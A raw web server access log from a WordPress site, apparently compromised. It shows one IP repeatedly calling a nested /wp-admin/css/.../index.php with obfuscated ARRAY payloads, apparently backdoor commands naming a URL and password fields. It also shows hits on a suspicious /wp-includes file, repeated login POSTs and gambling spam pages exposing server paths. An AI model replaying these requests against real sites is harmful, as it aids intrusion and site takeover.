142.4.205.1 - - [16/Oct/2025:11:24:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313838342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383238342q6434313464643139626261376534353262336530326135623431383965393663222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:25:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313930342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383330342q3562613663616136343164303737376433353639343136663636353465623066222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:25:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313932342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383332342q3637353466396362636631666636323338626161646461353333346532633837222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:25:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313934342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383334342q3262306365396535633037643634623135643761373339623931323565623061222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:26:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313936342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383336342q6361346639363331363863383937666264363633653966363364633432653264222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:26:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313938342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383338342q3533346231343734633961346632643136663038663637376230323961376530222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:26:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323030342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383430342q3330626266663366343561343761643939373166613236313938303139373439222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:27:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323032342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383432342q6132643161343739306237613363393731333062646130306236613265336639222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
204.12.208.18 - - [16/Oct/2025:11:28:07 -0400] "GET /wp-includes/wpdc3def/index.php HTTP/1.0" 200 4154 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16"
66.249.65.195 - - [16/Oct/2025:11:28:17 -0400] "GET /?_g=1333096 HTTP/1.0" 200 24281 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:11:27:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323034342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383434342q6234333466623864333332616563333438336665373766373830646639623335222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
196.251.83.229 - - [16/Oct/2025:11:28:24 -0400] "POST /wp-login.php HTTP/1.0" 200 102732 "-" "Mozilla/5.0"
196.251.83.229 - - [16/Oct/2025:11:28:24 -0400] "POST /wp-login.php HTTP/1.0" 200 102732 "-" "Mozilla/5.0"
196.251.83.229 - - [16/Oct/2025:11:28:24 -0400] "POST /wp-login.php HTTP/1.0" 200 102732 "-" "Mozilla/5.0"
142.4.205.1 - - [16/Oct/2025:11:27:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323036342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383436342q3831306233366161353762666666303237343637306331343931623539396262222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
202.124.204.254 - - [16/Oct/2025:11:28:43 -0400] "GET /wp-login.php HTTP/1.0" 200 9239 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7"
177.75.138.174 - - [16/Oct/2025:11:28:58 -0400] "GET /robots.txt HTTP/1.0" 200 4352 "-" "Python/3.11 aiohttp/3.11.12"
142.4.205.1 - - [16/Oct/2025:11:28:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323038342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383438342q3133646438653765336339303063636163336433643633393964613364653038222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
202.124.204.254 - - [16/Oct/2025:11:29:06 -0400] "POST /wp-login.php HTTP/1.0" 200 9227 "https://academiedumarketing.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7"
204.12.208.18 - - [16/Oct/2025:11:27:47 -0400] "GET /wp-includes/wpdc3def/index.php HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7"
142.4.205.1 - - [16/Oct/2025:11:28:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323130342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383530342q3562373264623436623230333637303035353064366564373838316165653632222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:28:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323132342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383532342q6163653236623539353534653437323330353932333639666338313861393761222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
54.156.55.147 - - [16/Oct/2025:11:29:53 -0400] "GET /2025/10/03/best-strategies-for-togel-players/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-admin HTTP/1.0" 200 10462 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:11:29:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323134342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383534342q3032653664343037663932636563663536386638666537346230633066653561222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:29:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323136342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383536342q3934333466666434323565326230386539346166626332616137346134373930222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:11:29:16 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:11:29:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323138342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383538342q3038333564396634646635323033653364313638336139653237626566323261222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
34.236.41.241 - - [16/Oct/2025:11:30:46 -0400] "GET /2025/10/03/best-strategies-for-togel-players/?path=/var/www/vhosts/academiedumarketing.com/public_html/njABawTk HTTP/1.0" 200 7185 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:11:30:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323230342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383630342q3661393937663265313139383639343864376132353965666237313037386133222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:30:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323232342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383632342q3038373438366432623031333038383236313831313734336631393632383631222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.131.235 - - [16/Oct/2025:11:31:42 -0400] "GET /2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/SimplePie/library/SimplePie/Decode HTTP/1.0" 200 7090 "https://academiedumarketing.com/2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/SimplePie/library/SimplePie" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:11:30:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323234342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383634342q3261323236663036653639383732653763393961306230666366653761646363222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:31:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323236342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383636342q3465373433373065306466323937383137626130356634323862356433363561222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:31:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323238342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383638342q3862613564633534366666336139313633336135626164616433666139303763222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:31:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323330342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383730342q3936306637383664303265646430393637663565666135386462393739663739222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:32:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323332342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383732342q3431613139653066666634346630623164343637383862663634623138653536222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:32:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323334342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383734342q3761396366623535393032306364653637363464326532376535663432626561222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:32:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323336342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383736342q3336636132343934623662643764323430396563613062396332346333613365222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:33:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323338342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383738342q6433656636653433633139336165363763396635383439363161333561353763222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:33:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323430342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632383830342q6630386563663261346561333766636239623736626334616231343863343062222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
